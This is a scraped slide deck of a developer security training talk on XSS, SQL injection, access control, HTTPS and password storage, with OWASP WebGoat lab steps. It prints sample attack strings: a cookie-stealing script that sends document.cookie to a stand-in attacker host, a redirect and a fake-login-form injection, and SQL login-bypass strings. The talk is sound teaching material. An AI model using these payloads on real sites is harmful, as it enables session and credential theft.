The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Recently uploaded (20)

Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Devbeat Conference - Developer First Security

  • 1. Developer-first security Integrating Security into Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
  • 4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
  • 5. Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
  • 7. Security - Into The Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
  • 8. WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  • 9. 3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
  • 10. What are Web Requests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
  • 11. Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
  • 12. XSS Behind The Scenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
  • 13. XSS Behind The Scenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 14. XSS - Injecting HTML Rendered HTML
  • 15. Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
  • 17. Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  • 19. Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  • 20. XSS Prevention • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; &#x27; &amp;
  • 21. XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 22. Safe Handling Rendered HTML Glad to see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 23. XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
  • 24. SQL Injection • Problem: User controlled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
  • 25. Lab! - SQL Lesson
  • 26. SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  • 27. SQL Injection • HTTP Post
 employee_id=112&password=x' OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
  • 28. SQL Injection • Parameterized Queries
 No confusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

  • 30. Access Control • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

  • 31. Lab! - Access Control
  • 32. Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  • 33. Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
  • 34. Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
  • 37. Insecure Session Management • Secure login over HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
  • 38. Vulnerable Redirects • User requests HTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
  • 39. Secure Design for Communication • Use HTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
  • 40. Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
  • 41. Secure Data Storage & Protection
  • 42. Password Storage Bad Approaches! • Your own algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
  • 43. What Are We Protecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
  • 44. Architecture for Sensitive Data https://site.com web server internal SSL database Monitor Database Queries & Response Size
  • 45. Encrypting Sensitive Data in Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
  • 47. Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
  • 48. Denial of Service Network DDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
  • 49. Application Denial of Service Application DDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
  • 50. Credential Stuffing compromised! server! Credentials! joe: abc123! sue: password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
  • 51. Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
  • 54. Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
  • 55. Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
  • 56. WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  • 57. Understanding the Proxy • Proxy is middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
  • 58. Understanding the Proxy Primary OS Browser Web Proxy Your Computer VM Web Server
  • 59. Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
  • 60. Using A Proxy • ZAP - Configure to listen on 8080
  • 61. Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
  • 62. Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
  • 63. Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
  • 64. “Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server